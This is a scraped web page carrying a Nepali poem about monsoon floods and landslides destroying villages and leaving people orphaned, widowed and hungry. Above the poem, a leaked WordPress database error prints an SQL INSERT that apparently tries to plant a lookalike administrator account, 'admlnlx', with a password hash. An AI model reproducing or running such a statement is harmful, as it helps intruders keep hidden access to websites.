WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdwREquObA9qz50oA3ILTpEqkplbPV.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 08:50:15', '', 'admlnlx', 'admlnlx')
इन्द्रेणीले सातै रङ फिजाएर एकै क्षण
मेरो गाउँले बादलुको घुम्टो बेर्छन्
देखिन्न वर र परको के गर्दैछन्
बुझिन्न कहिकतै कसले के सोच्दैछन्
दिन हो कि रात, गाह्रो छ छुट्याउन
थाहा छ अमूल्य छ समय
तर कठिन छ दिनहरु बिताउन
त्रासैत्रासभित्र बित्छन् अधकल्चो रातहरु
थुप्रै खेल्छन् मनभित्र डरका बातहरु ।
दिनभरि झरी पर्दा नि थाक्दैन आकाश
रातभरि पनि आइरहन्छ बर्षाको त्रासदी आवाज
जमिन थाक्यो, पहाड गल्यो
गल्यो सारा पृथ्वी
खोला भयो खहरे
खहरे भयो ठुलो छाँगा
सब भयो नदिनाला र कोशी
कोशी भयो समुन्द्र ।
बगायो पहाड, बगायो जङ्गल
बगायो सारा गाउँ, उजाड बनायो
बगायो बिकासका संरचनाहरु
छिनायो हजारौं पुलपुलेसा
थुनिए थुप्रै बिकासका द्वारहरु
दुनियाँलाई बगायो, रुवायो
अपांग बनायो
टुहुरो बनायो
बिधुवा बनायो
बनायो आमालाई बेसहारा
शोक र भोकैभोकमा भए सारा।
चुपचाप हेरिरहेको छु
यो आक्रान्त र यो बिपत्ति
अनि यो घनाघोर भित्रैबाट पनि
मुस्कुराउने प्रयास गर्दै छु ।
***